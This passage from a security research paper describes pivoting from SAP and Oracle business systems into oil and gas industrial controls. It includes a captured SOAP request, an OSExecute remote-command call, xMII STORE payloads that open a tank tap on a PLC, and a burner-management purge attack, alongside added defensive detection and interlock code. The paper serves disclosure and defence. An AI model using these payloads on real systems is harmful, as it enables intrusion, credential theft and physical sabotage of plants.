–– Siemens
–– MODCON MOD-800
–– + hundreds of specific devices for each refinery stage

Enterprise Application in Oil and Gas
SAP (ABAP, J2EE, Mobile, HANA, BusinessObjects) and Oracle (EBS, PeopleSoft, JDE, Siebel)
applications are very common in large companies. In the Oil and Gas sector, SAP has more than
246000 customers worldwide, including 86% of the Forbes 500 and 85% of the Fortune 2000 Oil and Gas
companies. Oracle applications are used by 100% of Fortune 100 companies.

SAP in Oil and Gas

Today, upstream operations bring together many technical disciplines and business functions that are
loosely connected. The challenge is to support a closed-loop view, leveraging a common platform
for operations and maintenance, to enable you to gather, analyze, decide, and execute across the
many elements that drive performance of assets at different lifecycle stages.

SAP in Oil and Gas: Capital and Spend Effectiveness
Advantages:

• Improving supplier relations
• Reducing the cost of processing supplier invoices
• Enhancing visibility and transparency

Risks:

• Availability – direct impact on cost effectiveness
• Fraud – price/quantity manipulation

Applications:

• SAP PPM

SAP in Oil and Gas: Hydrocarbon Supply Chain

Advantages:

• Hydrocarbon production management
• Hydrocarbon revenue management
• Field logistics

Risks:

• Supply chain Availability – direct impact on cost effectiveness
• Fraud in SAP – Manipulations with quantities*
• Sabotage - Physical damage

Applications:

• SAP's ECC IS-OIL

Hydrocarbon volumes, which are the basis for pricing, excise duty, and transportation fees,
fluctuate depending on environmental temperature and pressure conditions; as we require
masses and weights for product valuation, and weighing is not possible, we must derive
them from volumes at ambient temperature and pressure conditions, requiring complex
conversion calculations of the observed volumes at each custody transfer point. Different units
of measurement are in use globally, further complicating the issue, as even modern terminal
automation systems do not support all units of measure – Forrester Research

SAP in Oil and Gas: Integrated Digital Oilfield Operations
Advantages:

• Integrate production, maintenance, and engineering operations
• Streamline data collection, validation, surveillance, and notification
• Close the gap between decision-making and on-field execution

Risks:

• Sabotage - Physical damage to production and engineering devices
• Operations Availability – direct impact on cost effectiveness
• Data manipulation in SAP – improper management decisions, lost profits

Applications:

• SAP ECC IS-OIL
• SAP PRA (production and revenue accounting)
• SAP RLM (remote logistic management)

SAP in Oil and Gas: Operational Integrity

Advantages:

• Monitor key risk indicators and access control policy
• Maintain the structural and mechanical integrity of physical assets
• Manage emissions, hazardous substances, and product and regulatory compliance

Risks:

• Access control, data manipulation
• Sabotage - Physical damage to production and engineering devices
• Compliance Violation – Data manipulation to give an illusion of meeting compliance requirements

Applications:

• SAP EAS/PM (Asset Management)
• SAP UOM (Upstream Operation Management)

Oracle in Oil and Gas
Oracle, like SAP, offers solutions that fulfil the requirements of the Oil and Gas industry.

Product Lifecycle and Production Optimization

Oracle Primavera, Oracle PPM

Asset Management

• Oracle EAM (Based on Oracle E-Business Suite)
• Oracle Field Service, based on Oracle E-Business Suite (formerly Service Online), drives profitability
by automating the process of dispatching field technicians to service calls in remote locations.
Field Service improves customer satisfaction by more accurately predicting a window to promise
for service delivery, and it contains a Manager component designed to eliminate guesswork surrounding
qualification, availability, and geographic relevance of each field service technician. [17]

LIMS

Most of the Laboratory Information Management Systems (LIMS) that we saw use Oracle Database to store
data.

IT applications VS OT processes
Let's look at how business applications are connected with critical OT business processes.

• Enterprise project portfolio management <- Exploration
–– SAP PPM, Oracle PPM Primavera, MS Project, MS SharePoint
• Asset Lifecycle Management <- Refinery, Separation
–– SAP EAM (+AssetWise APM), Oracle EAM (Based on EBS), Schneider Electric's Avantis EAM,
IBM Maximo
–– Connect with: OSIsoft® PI System, AspenTech® IP21, Honeywell® PHD
• LIMS <- Refinery
–– Custom app based on Oracle DBMS
• Tank Master Data (TMD) <- Tank Inventory
–– SAP IS-OIL-TAS, Aspentech
• Production Accounting System (PAS) <- Fiscal Metering
–– SAP IS-OIL-PRA

In real life, a simple scheme may look like this:

Attacking Oil and Gas
From the Internet to CORP
There are many ways for an attacker to get access to the corporate network. Here are some of the
most common options. You can find more examples in our previous SAP Security presentations.

• Via Internet resources (SAP Portal/CRM/SRM)
–– http://erpscan.com/wp-content/uploads/2013/07/SAP-Portal-Hacking-and-Forensics-at-Confidence-2013.pdf
• Via Partners (SAP XI)
–– http://erpscan.com/wp-content/uploads/publications/SSRF-vs-Businness-critical-applications-final-edit.pdf
• Via SAP Router
–– http://erpscan.com/advisories/dsecrg-13-013-saprouter-heap-overflow/
• Via Workstations (Trojans)
–– http://erpscan.com/wp-content/uploads/publications/SAP-Security-Attacking-SAP-clients.pdf
• Via Unnecessary SAP Services exposed to the Internet
–– http://erpscan.com/wp-content/uploads/publications/SAP-Security-Attacking-SAP-clients.pdf
From Internal (CORP) Network to ERP
An ERP system can be compromised in numerous ways:

• Vulnerabilities
• Misconfigurations
• Unnecessary privileges
• Custom code issues

Vulnerabilities

Misconfigurations
Enterprise applications are very complex. For example, in SAP systems alone you can find:

• ~1500 profile parameters
• ~1200 web applications
• ~700 web services
• ~100 specific commands for MMC
• ~100 specific checks for each of the 50 modules (FI, HR, Portal, MM, CRM, SRM, PLM, Industry
solution…)

As you know, complexity kills security. Any of these settings can be implemented improperly,
allowing cybercriminals to obtain access to mission-critical systems. To minimize threats, we
recommend that you read the SAP Security guides on our website.

Custom code issues

Domain specific languages in business applications (ABAP, PeopleCode, XSJS, X++) can have
vulnerabilities as well as backdoors left by 3rd party developers. [18]

Unnecessary privileges
Critical privileges and SoD issues

• For example, one can create a fake vendor and then approve a payment order for this vendor.
• Usually ((~100 Roles X 10 actions)^2)/2 = 500k
• That is 500k potential conflicts for each user!
• It usually takes two years to decrease the number of conflicts from millions to hundreds.
• And you will still be vulnerable.

From ERP to OT
Now we are at the final stage: how to pivot from business applications to critical processes.

Typically, the relations between them are as follows. Please keep in mind that this is just the tip of
the iceberg.

• SAP ERP -> SAP XMII -> SAP PCo -> DCS/SCADA -> PLC -> Meter
• SAP ERP -> SAP XMII -> SAP PCo -> PLC -> Meter
• SAP ERP -> SAP XMII -> DCS/SCADA(OPC) ->PLC-> Meter
• SAP ERP -> SAP PCo -> OPC Server -> PLC -> Meter
• SAP ERP -> SAP PCo -> PLC -> Meter
• SAP ERP(PP) -> SAP PI -> OPC-> PLC -> Meter
• SAP ERP(PP) -> SAP PI -> SAP xMII->OPC -> PLC -> Meter
• SAP PM (EAM) -> OsiSoft PI -> OPC
• SAP HANA (Rolta OneView) -> OPC/DCS ->PLC->Meter
• Oracle EAM ->OPC->PLC ?????
• Oracle DB (LIMS) -> DCS -> PLC-> Meter
• Domain Controller -> SAP PCo -> PLC -> Meter
• Shared SSH keys
• Similar passwords
• Improper firewall configurations

ERP as entry point
In this research, we will demonstrate four ways how vulnerabilities in business applications can lead to
security incidents.

Oracle EAM
Oracle Enterprise Asset Management is an application based on the Oracle E-Business Suite platform; thus,
every vulnerability that enables unauthorized access to Oracle EBS can be used to break into the Oracle
EAM system. For instance, ERPScan experts have recently disclosed details of 6 vulnerabilities in Oracle
E-Business Suite. These issues are an XSS vulnerability, an SQL Injection vulnerability, several XXE Injection
vulnerabilities, and a User Enumeration vulnerability. Some of them (SQL Injection, XXE Injections) allow
an attacker to gain unauthorized access to the business application with administrator rights.

SAP HANA
There are several possible paths to get a handle on the industrial processes. SAP HANA is an in-
memory database solution that combines database, application processing, and integration services
on a single platform.

It is a good option to store industrial processes data and manage it in real time. SAP HANA has
several critical vulnerabilities. At the end of September, we reported an unauthenticated remote code
execution vulnerability via a memory corruption bug. It is the perfect way to get an entrance ticket to
the OPC servers that are directly connected to HANA.

SAP Manufacturing Integration and Intelligence
There are more common ways of interconnecting the ERP world to the industrial one. The prevalent
architecture uses the SAP xMII solution to collect industrial data from SAP Plant Connectivity (PCo) that
relays information sent from OPC server or DCS/SCADA systems.

MII stands for Manufacturing Integration and Intelligence. SAP MII provides a direct connection
between shop-floor systems and business operations.

SAP MII is a technology following the SAP xApps convention and running on an SAP NetWeaver
application server. SAP xApps are composite applications which can combine web services and data
from multiple systems. The application architecture is defined by the SAP Composite Application
Framework within the SAP NetWeaver platform. The framework includes methodology, tools, and run-
time environment to develop composite applications. It provides a consistent object model and allows
developers to build composite applications with a rich user interface, which can access multiple other
heterogeneous applications via services.

From an attacker’s point of view, it is a fertile ground for interesting vulnerabilities.

From a technical perspective, MII is accessed through its main application xmii~xapps~ears and
manages several servlets at different URL endpoints defined in a web.xml file. The web entry point is
defined as 'XMII'. This means that if our server listens (by default) on TCP port 50000, we should have
access to its MII part at the URL http://server:50000/XMII.

Getting admin rights on the Netweaver platform

SAP Netweaver stores its persistent data in a Sybase database. We can locate the tables where the
encrypted user credentials are stored, but how do we get them?

By analyzing several servlets (not related to MII), we found several vulnerabilities, in particular a blind
SQL injection that allows reading the content of SYSTEM tables anonymously and, under certain
conditions, those owned by our MII application.

With a time-based comparison between successful SQL requests and failing ones, we can retrieve the
content of the Administrator's hashed password one character per request. Another weakness in
the way the password is encrypted enables recovering the clear text password.

While those problems are still being dealt with by SAP, we can't disclose any details.

Getting OS rights on the MII server

After obtaining those Administrator credentials, we can take advantage of the rich user experience provided by
the web admin interface. We found out, for instance, that through the "Log viewer" feature we can ask
the server to connect to a remote system on port 50013 using the protocol "SAP Instance Agent".

This functionality uses the SAPControl web services, accessible via a SOAP web interface on TCP port
50013, to get information about server health. This service is offered by the daemon sapstartsrv, which is
the parent of all the other SAP instance processes. It exposes a vast number of methods, and some of them
have had vulnerabilities such as information disclosure and remote command execution in the past.

SAP Technical Documentation says about it:

"The SAP Start Service (sapstartsrv) provides basic management services for systems and
instances and single server processes. Services include starting and stopping, monitoring the
current run-time state, reading logs, traces and configuration files, executing commands and
retrieving other technology-specific information, like network access points, active sessions,
thread list etc. They are exposed by an SOAP Web service interface named "SAPControl"."

Of course, the part mentioning "executing commands" will hold our attention.

Usually, the authentication methods of this SOAP service should be used with an OS level user account
(miiadm in this case), but there are some undocumented features.

If we listen on port 50013 on our own machine, we will see something like:

POST /SAPHostControl.cgi HTTP/1.1
Host: 172.16.2.31:50013
Content-Type: text/xml; charset=UTF-8
Connection: close
Authorization: Basic ezI[...]eA==
SAP-PASSPORT: 2A54482A0300E600[...]
Content-Length: 334
SOAPAction: ""
<?xml version="1.0" encoding="UTF-8" ?><SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xs="http://www.w3.org/2001/XMLSchema"><SOAP-ENV:Body><yq1:GetVersionInfo
xmlns:yq1='urn:SAPControl'></yq1:GetVersionInfo></SOAP-ENV:Body></SOAP-ENV:Envelope>

When analyzing the reverse connection made by the server to our computer, we noticed that it uses
the HTTP header "Authorization" with base64-encoded credentials and sends a SOAP request,
assuming that we will have an SAPControl-speaking service at our end. The server thereby leaks its internal
trusted account password to us (this password is random and changes every time the service is started).

If we use the SOAP method OSExecute() with this special account, we get remote command
execution with 'miiadm' rights. With a custom SOAP python wrapper, we can easily consume this
service like this:

$ soap_cli.py --host $SAPMII --port 50013 \
    --user [redacted] --password [redacted] \
    --method OSExecute /usr/bin/whoami
(200, (reply){
   exitcode = 0
   pid = 29342
   lines =
      (ArrayOfString){
         item[] =
            "miiadm",
      }
 })
It doesn’t take too long to have an interactive shell with ‘miiadm’ user rights (without knowing its
password).

Even if this is not necessary to reach our goal, we can then read the Netweaver SecretStore files
(properties and key) to decrypt different accounts and passwords of the Sybase database because
they are readable by the miiadm user.

Another attack vector to get OS access on MII is to use a directory traversal and a file disclosure to
get the SecStore files, access Sybase with administrative rights and use the external procedure xp_
cmdshell if available.
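As an added defensive example (not ERPScan's tooling and not SAP's code), the following Python classifies SAPControl requests of the kind shown above by the method name carried in the urn:SAPControl body and by the presence of HTTP Basic credentials, so a sensor watching tcp/50013 can alert on OSExecute calls and on credentials leaving the MII host. The sample requests, the user name and the IP address are constructed.

```python
"""Classify SAPControl (sapstartsrv) SOAP requests seen on tcp/50013."""
import base64
import xml.etree.ElementTree as ET

SOAP_ENV = "http://schemas.xmlsoap.org/soap/envelope/"
SAPCONTROL_NS = "urn:SAPControl"
# Methods that execute commands; OSExecute is the one discussed above.
# Everything else is treated as read-only monitoring (GetVersionInfo, ...).
SENSITIVE_METHODS = frozenset({"OSExecute"})


def split_http_request(raw: str):
    """Split a raw HTTP/1.1 request into (request line, header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def sapcontrol_method(soap_body: str):
    """Return the SAPControl method invoked in the SOAP body, or None."""
    try:
        root = ET.fromstring(soap_body)
    except ET.ParseError:
        return None
    body = root.find(f"{{{SOAP_ENV}}}Body")
    if body is None:
        return None
    for child in body:
        if child.tag.startswith(f"{{{SAPCONTROL_NS}}}"):
            return child.tag.split("}", 1)[1]
    return None


def basic_auth_user(headers):
    """Decode only the user name from an HTTP Basic header; the password is never returned."""
    auth = headers.get("authorization", "")
    if not auth.lower().startswith("basic "):
        return None
    try:
        decoded = base64.b64decode(auth[6:], validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    return decoded.split(":", 1)[0]


def assess_request(raw: str, from_mii_host: bool):
    """Alert record for one request on tcp/50013.

    from_mii_host marks a connection initiated by the MII server itself (the reverse
    connection the Log viewer feature makes), which is where the trusted-account
    credentials leak to whoever listens."""
    _, headers, body = split_http_request(raw)
    method = sapcontrol_method(body)
    user = basic_auth_user(headers)
    findings = []
    if method in SENSITIVE_METHODS:
        findings.append(f"command-execution method {method} invoked")
    if user is not None and from_mii_host:
        findings.append(f"MII host sent HTTP Basic credentials for '{user}' to a remote system")
    return {"method": method, "user": user, "findings": findings}


def http_request(method_xml: str, user: str, password: str) -> str:
    """Constructed sample with the structure of the request captured above."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    body = (
        '<?xml version="1.0" encoding="UTF-8" ?>'
        f'<SOAP-ENV:Envelope xmlns:SOAP-ENV="{SOAP_ENV}" '
        'xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" '
        'xmlns:xs="http://www.w3.org/2001/XMLSchema">'
        f"<SOAP-ENV:Body>{method_xml}</SOAP-ENV:Body></SOAP-ENV:Envelope>"
    )
    headers = [
        "POST /SAPHostControl.cgi HTTP/1.1",
        "Host: 192.0.2.10:50013",  # documentation address, not a real host
        "Content-Type: text/xml; charset=UTF-8",
        "Connection: close",
        f"Authorization: Basic {token}",
        f"Content-Length: {len(body)}",
        'SOAPAction: ""',
    ]
    return "\r\n".join(headers) + "\r\n\r\n" + body


# Constructed samples: the GetVersionInfo call shown above, and an OSExecute call.
SAMPLE_VERSION_INFO = http_request(
    "<yq1:GetVersionInfo xmlns:yq1='urn:SAPControl'></yq1:GetVersionInfo>",
    "trusteduser", "constructed-not-a-real-secret")
SAMPLE_OSEXECUTE = http_request(
    "<yq1:OSExecute xmlns:yq1='urn:SAPControl'></yq1:OSExecute>",
    "trusteduser", "constructed-not-a-real-secret")

if __name__ == "__main__":
    for sample in (SAMPLE_VERSION_INFO, SAMPLE_OSEXECUTE):
        print(assess_request(sample, from_mii_host=True))
```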

SAP Plant Connectivity
SAP MII can get its industrial data through SAP Plant Connectivity (PCo). It acts like a bridge between
the industrial and ERP worlds. SAP PCo defines agents that send some tags from sources to a
destination (in this case, SAP MII) with a built-in decision engine.

The sources are, for instance, Matrikon OPC Server, Siemens Simatic or KEPServerEX, among the widely used
OPC implementations.

The setup between SAP MII and SAP PCo can follow two main modes:

• Notification mode
• Query mode

In the notification mode, PCo sends its data to MII "Transactions" via a web service endpoint
and transmits user credentials via HTTP Basic Authentication. The connection can be secured via
SSL, and there is a check box to allow connections with an untrusted server certificate. By default, the
connection is made over HTTP.

For an attacker sitting on MII, this connection mode doesn't reveal much about PCo. So, let's have a
look at the Query mode.

This mode allows MII to send queries to PCo and retrieve operational data. It uses a custom SAP
protocol designed over XML, named xMII. Its basic operations are to retrieve data and store data. PCo
forwards those requests to its sources, which deliver the data.

In SAP MII, to enable this mode we need to add a new Data server with the connector type
PCoConnector. Then we need either to fill in a URL to the PCo instance or to register our PCo
instance from the SLD (System Landscape Directory). The URL corresponding to the Management
SOAP service looks like this: http://pcoserver:50050/PCoManagement. We will come back to that soon.

The test connection made to the SOAP service requires valid Windows credentials. We notice
the agent port (by default, tcp/9000) that is retrieved from the configuration. The special xMII
packets are exchanged through this port.

Our question now is where and in what form those credentials are stored. We found out that the table
SAPSR3DB.XMII_SERVERPROP contains all the data about data servers, and the password is encrypted
with 3DES, with the key stored inside the SecureStorage service. The SecureStorage is used like a
vault, and each application gets a specific handle to access its own private data.

The first idea was to connect from the outside, with our stolen NetWeaver admin credentials, via
ICM to the service and dump the key associated with our xMII application, but it failed. Access to
SecureStorage is denied if the request doesn't come from a trusted execution path; a call stack validation is
enforced here.

We hadn't got very far in circumventing that by modifying the xMII application (we can still deploy
code with admin rights) when we found out that we can simply lower the encryption scheme to Base64.
Then it becomes trivial to read the correct database column through the SQL injection and obtain the clear
text password of our Windows PCo user.

So, we can control the PCo behavior from its authenticated SOAP endpoints – start and stop agents, get
information about sources, dump the configuration, load a different configuration…

That is interesting, of course, but what about modifying the live data or faking it? That's where the
query port tcp/9000 comes into play. By default, the communication is not authenticated. We can send
our own requests from our MII access and they will be forwarded to the industrial sources.

Disclosing data from industrial process
After having identified several (undisclosed) problems with the implementation of the server on PCo,
we can read the exported tags of the OPC server for all the running agents with our own xMII client. That
means raw industrial data from the shop floor.

The xMII requests are 'encapsulated' in an XML message, with the tag operations being sent as CDATA.
Asking, for instance, for the value of the water level in our test setup based on an S7-1200 looks
like this:

<?xml version="1.0" encoding="UTF-8"?>
<pco:request xmlns:pco="uri:sap-pco-request"
pco:version="1.0">
<pco:tag>
<![CDATA[RETRIEVE 'TCPIP>S7>IW66';]]>
</pco:tag>
</pco:request>

where the tag TCPIP>S7>IW66 was defined as an alias for the S7 memory value at address %IW66.

We can draw the following parallel between the groups and tags of an OPC server and the files and
directories of a typical filesystem. If we want to know the base directories, we send the request
containing the CDATA 'LIST GROUPS'. If we want to list the tags in a specific group, we send 'LIST TAGS
IN "$GROUP"', with $GROUP replaced by a value received in the group list request. We can list
all the available tags recursively with one command, 'LIST TAGS RECURSIVELY'.

Modifying data
If there are exported tags with default read-write rights, we can use the STORE command to change
their value. That can be disastrous in some cases, of course.

We can use that in our setup to activate the water tap of our tank. The tag for the tap is at address
%M1.0, where a boolean is accessible with read and write access.

<?xml version="1.0" encoding="UTF-8"?>
<pco:request xmlns:pco="uri:sap-pco-request"
pco:version="1.0">
<pco:tag>
<![CDATA[STORE 'TCPIP>S7>M1.0' = 1;]]>
</pco:tag>
</pco:request>

We have just opened the tap, and the water is now flowing out of the tank. We can monitor the water
level with the previous read command to memory %IW66 and, when everything is done, we close the
tap with a similar operation, writing the "False" value to the memory address of the tap's tag.

<?xml version="1.0" encoding="UTF-8"?>
<pco:request xmlns:pco="uri:sap-pco-request"
pco:version="1.0">
<pco:tag>
<![CDATA[STORE 'TCPIP>S7>M1.0' = 0;]]>
</pco:tag>
</pco:request>

Faking data
With this knowledge, we can build our own PCo server answering the usual MII requests with
previously learned values while disrupting the industrial process in the background. We can control
agent states on the real PCo instance. The data server in the MII configuration just has to be pointed to
our (local) service hosted on MII.
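As an added example (not SAP's or ERPScan's code) covering the Disclosing data, Modifying data and Faking data sections above, this Python parser reads the pco:request messages exchanged on the unauthenticated query port tcp/9000, extracts the CDATA operation (RETRIEVE, STORE, LIST) and applies a policy that blocks STORE outside an allow-list and blocks LIST enumeration unless explicitly enabled, which is what a filtering proxy or IDS placed between MII and PCo would do. The allow-listed setpoint tag and the sample messages are constructed; the command grammar is only as far as the page shows it.

```python
"""Parse and police xMII query messages (pco:request) sent from MII to PCo."""
import re
import xml.etree.ElementTree as ET

PCO_NS = "uri:sap-pco-request"

# Command grammar as far as the page shows it: RETRIEVE/STORE on a quoted tag
# and the LIST forms used for enumeration. Case-insensitive, trailing ';' optional.
_RETRIEVE = re.compile(r"^RETRIEVE\s+'([^']+)'\s*;?$", re.I)
_STORE = re.compile(r"^STORE\s+'([^']+)'\s*=\s*([^;]+?)\s*;?$", re.I)
_LIST = re.compile(r'^LIST\s+(GROUPS|TAGS\s+RECURSIVELY|TAGS\s+IN\s+"[^"]*")\s*;?$', re.I)


def parse_pco_request(xml_text: str) -> dict:
    """Return {'verb', 'tag', 'value'} for one pco:request; raise ValueError otherwise."""
    root = ET.fromstring(xml_text)
    if root.tag != f"{{{PCO_NS}}}request":
        raise ValueError("not a pco:request message")
    tag_el = root.find(f"{{{PCO_NS}}}tag")
    # ElementTree returns the CDATA section as ordinary text, surrounding whitespace included.
    command = (tag_el.text or "").strip() if tag_el is not None else ""
    if not command:
        raise ValueError("pco:request carries no operation")
    if m := _RETRIEVE.match(command):
        return {"verb": "RETRIEVE", "tag": m.group(1), "value": None}
    if m := _STORE.match(command):
        return {"verb": "STORE", "tag": m.group(1), "value": m.group(2)}
    if m := _LIST.match(command):
        return {"verb": "LIST", "tag": m.group(1), "value": None}
    raise ValueError(f"unrecognised xMII operation: {command!r}")


def audit_request(xml_text: str, writable_tags: frozenset, allow_enumeration: bool = False):
    """Policy for the query port: reads pass, writes only to allow-listed tags,
    LIST only when enumeration is explicitly enabled. Returns (decision, parsed)."""
    req = parse_pco_request(xml_text)
    if req["verb"] == "RETRIEVE":
        return "allow", req
    if req["verb"] == "STORE":
        return ("allow" if req["tag"] in writable_tags else "block"), req
    return ("allow" if allow_enumeration else "block"), req


def pco_request(command: str) -> str:
    """Build a pco:request carrying one operation as CDATA (constructed test input,
    same layout as the messages shown above)."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<pco:request xmlns:pco="{PCO_NS}" pco:version="1.0">\n'
        f"<pco:tag>\n<![CDATA[{command}]]>\n</pco:tag>\n</pco:request>\n"
    )


# Samples from the setup described above (read water level, open/close the tap)
# plus an enumeration request; the writable setpoint tag is hypothetical.
SAMPLE_READ_LEVEL = pco_request("RETRIEVE 'TCPIP>S7>IW66';")
SAMPLE_OPEN_TAP = pco_request("STORE 'TCPIP>S7>M1.0' = 1;")
SAMPLE_CLOSE_TAP = pco_request("STORE 'TCPIP>S7>M1.0' = 0;")
SAMPLE_LIST_ALL = pco_request("LIST TAGS RECURSIVELY")
WRITABLE_TAGS = frozenset({"TCPIP>S7>SETPOINT"})  # hypothetical tag cleared for writes

if __name__ == "__main__":
    for sample in (SAMPLE_READ_LEVEL, SAMPLE_OPEN_TAP, SAMPLE_CLOSE_TAP, SAMPLE_LIST_ALL):
        decision, req = audit_request(sample, WRITABLE_TAGS)
        print(decision, req)
```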

From ICS to Process

Burners and combustion
Control of the air/fuel ratio is one of the most important functions of combustion/burner systems.
It must ensure that sufficient excess air is maintained at all times. There are three components in the
fire triangle. If one of them is missing, the reaction cannot be sustained. If fuel is missing, the
system is safe, but if air or heat for ignition is missing, the situation is potentially dangerous; for an
explosion to occur, however, the fuel/air mixture must be within the flammable range.

The basic strategy most commonly adopted to minimize the explosion risk is to ensure that flammable
mixtures do not accumulate anywhere within the plant. There are a number of potential sources of
flammable mixtures in a furnace or process plant. If an attacker wants to commit sabotage and stop
operations by disrupting the burning process, he needs to be able to control any of those sources of
flammable mixtures.

The threats come as follows:

• Oil or gas leak into the combustion chamber through the burner as a result of leaking fuel shut-off
valves.
• Deposits of coal or oil from previous firing periods were not properly purged from the system.
• Operation of the plant with insufficient combustion air results in CO and unburnt fuel in the
downstream ducting and dust collector. If the flame is not supplied with enough air, not all the fuel
can burn, resulting in unburnt hydrocarbons and carbon monoxide being formed.

• Quenching of the flame by cold dust entering the furnace. Cold dust can reduce the temperature
below the ignition temperature. Gas flames, where the product is directly heated by the flame, are
particularly vulnerable to this problem, as the high ignition temperature of natural gas is required.
The highest risk occurs during warm-up, when the system is relatively cool, or during serious
process upsets. When dust below 500 C is entrained in the combustion air, its thermal mass
reduces the flame temperature. If the amount of dust is excessive, it can cool parts of the flame
below the ignition temperature. If this occurs, unburnt gas is present in the combustion gases
and there is a risk of an explosion. Note that only a small amount of carbon monoxide is formed when
flame quenching happens, so it can only be detected by specific analyzers.
• Fuel enters the furnace as a result of repeated unsuccessful ignition attempts. This is a significant
risk with oil firing, particularly where the oil is not hot enough to ignite easily. A typical occasion
is cold oil remaining in pipes during shutdown. This is admitted to the furnace with each ignition
attempt but fails to ignite and sticks to the walls. When hot oil finally arrives at the burner, ignition is
achieved and the cold oil on the furnace walls is vaporized and ignited by the radiant heat from the
flame; the oil burns very rapidly and a damaging pressure increase occurs.
–– Deposits of oil are usually removed by the air purge. However, deposits from unstable and
sub-stoichiometric operation followed by a burner trip are not always removed by the combustion
air pre-purge, especially cold viscous oil, and only manual cleaning can help here.
–– Another danger arises on plants where staff can access the BMS timers: in case of repeated
failures to ignite, they may shorten the purge time to reduce lost production costs. Usually,
the time is 10-20 minutes.

The burner management system (BMS) performs a vital safety function: it prevents operator errors
from leading to danger and shuts the burner down safely in case of other equipment malfunction.

The main function of the BMS is to allow and ensure the safe start-up, operation and shutdown of the
fired heater. Once the logic is configured and the system properly commissioned, the BMS provides
a safe and consistent operating sequence. The human interface guides the operator so that the
heater can be operated safely and, if needed, quickly and safely restarted.

There are two main types of failure which a BMS should prevent:

• Failure to shut off the fuel supply when a dangerous situation arises, for example, failure to close
the fuel valves following a loss of flame.
• Equipment failure that causes a dangerous function to occur, for example, a broken wire opening
the fuel valves.

Since the BMS manages all processes critical to burner safety, unauthorised access to it can lead to
multiple risks, up to and including an explosion. The simplest attack on a BMS is to turn off the purge.
As mentioned above, cold oil left in the pipes during previous shut-downs can then burn very rapidly
and damage equipment.
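The purge interlock and the two failure classes above, as an added example (not the paper's code and not any vendor's BMS logic): a simplified burner sequence in Python in which purge time accumulates only while combustion air is proven, the fuel safety shut-off valve is energize-to-open so that a broken wire closes it rather than opening it, and every trip de-energizes the valve. The purge_attack function plays the timer attack from the threat list: someone with access to the BMS timers sets the purge time to zero and the burner is restarted after each failed ignition, first against a build that accepts the write and then against one that enforces a floor. The 600 s floor, the 25% airflow threshold and the scan samples are assumptions.

```python
"""Simplified burner management sequence (purge -> ignition -> run) with trips.

Added example; not the paper's code and not any vendor's BMS logic. The names and
numbers (MIN_PURGE_S, MIN_AIRFLOW_PCT, the scan samples) are assumptions chosen for
illustration.
"""
from dataclasses import dataclass, field

MIN_PURGE_S = 600        # assumed safety floor; the text gives 10-20 min as the usual purge time
MIN_AIRFLOW_PCT = 25.0   # assumed minimum proven combustion-air flow (% of design)


def fuel_valve_open(bms_output_energized: bool, wire_intact: bool) -> bool:
    """Energize-to-open safety shut-off valve: open only while the BMS output is energized
    and the wire carries it, so a broken wire closes the valve instead of opening it."""
    return bms_output_energized and wire_intact


@dataclass
class Burner:
    enforce_min_purge: bool = True   # hardened build refuses purge-timer writes below the floor
    purge_s: int = 900               # configured purge time in seconds (what timer access changes)
    state: str = "IDLE"
    energized: bool = False          # BMS output to the fuel safety shut-off valve
    purged_s: int = 0                # seconds of purge completed with proven airflow
    fuel_admissions: int = 0         # how many times fuel has been admitted to the furnace
    log: list = field(default_factory=list)

    def set_purge_timer(self, seconds: int) -> int:
        """Timer write from the HMI or engineering station. Returns the value now in effect."""
        if self.enforce_min_purge and seconds < MIN_PURGE_S:
            self.log.append(f"REJECTED purge timer {seconds}s below floor {MIN_PURGE_S}s")
            return self.purge_s
        self.purge_s = seconds
        return self.purge_s

    def trip(self, reason: str) -> None:
        self.energized = False       # failure class 1: fuel is shut off on every trip
        self.state = "LOCKOUT"
        self.log.append(f"TRIP: {reason}")

    def reset(self) -> None:
        """Operator reset after a lockout; the next scan starts a full purge again."""
        if self.state == "LOCKOUT":
            self.state = "IDLE"

    def step(self, airflow_pct: float, flame: bool, dt: int = 1) -> str:
        """One BMS scan of dt seconds with the given field inputs. Returns the new state."""
        if self.state == "IDLE":
            self.state, self.purged_s = "PURGE", 0
        if self.state == "PURGE":
            # Purge time accumulates only while airflow is proven; a dropout restarts it.
            self.purged_s = self.purged_s + dt if airflow_pct >= MIN_AIRFLOW_PCT else 0
            if self.purged_s >= self.purge_s:
                self.state = "IGNITION"
        elif self.state == "IGNITION":
            self.energized = True    # fuel admitted for the trial for ignition
            self.fuel_admissions += 1
            if flame:
                self.state = "RUN"
            else:
                self.trip("ignition failed; full purge required before the next trial")
        elif self.state == "RUN":
            if not flame:
                self.trip("flame loss")
            elif airflow_pct < MIN_AIRFLOW_PCT:
                self.trip("combustion air below minimum")
        return self.state


def run_scans(burner: Burner, scans) -> str:
    """Feed (airflow_pct, flame_detected) samples, one per scan; returns the final state."""
    for airflow_pct, flame in scans:
        burner.step(airflow_pct, flame)
    return burner.state


def purge_attack(hardened: bool, attempts: int = 3) -> dict:
    """Someone with access to the BMS timers sets the purge time to zero and the burner is
    then started repeatedly while the oil fails to ignite. Constructed scans: four seconds
    of proven airflow per attempt, no flame. Returns how often fuel reached the furnace."""
    b = Burner(enforce_min_purge=hardened)
    b.set_purge_timer(0)
    for _ in range(attempts):
        run_scans(b, [(100.0, False)] * 4)
        b.reset()
    return {"fuel_admissions": b.fuel_admissions, "state": b.state,
            "purge_s_in_effect": b.purge_s, "log": b.log}


if __name__ == "__main__":
    for hardened in (False, True):
        print("hardened" if hardened else "unhardened", purge_attack(hardened))
```

In the unhardened build every restart admits fuel to the furnace after a single second of purge, which is exactly the repeated-ignition-attempt case in the threat list; the hardened build rejects the write, logs it, and stays in PURGE until the floor is met. The floor belongs in the safety logic itself, not in the HMI, so that HMI or engineering-station access cannot lower it, and the valve stays closed on a broken wire only because the output is energize-to-open.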

Conclusion
The report has demonstrated that it is possible to carry out four attack vectors and penetrate
business-critical processes, which allows an attacker to carry out further attacks. Apart from the risks
directly related to ICS systems, there are other threats that might look less critical but in the worst
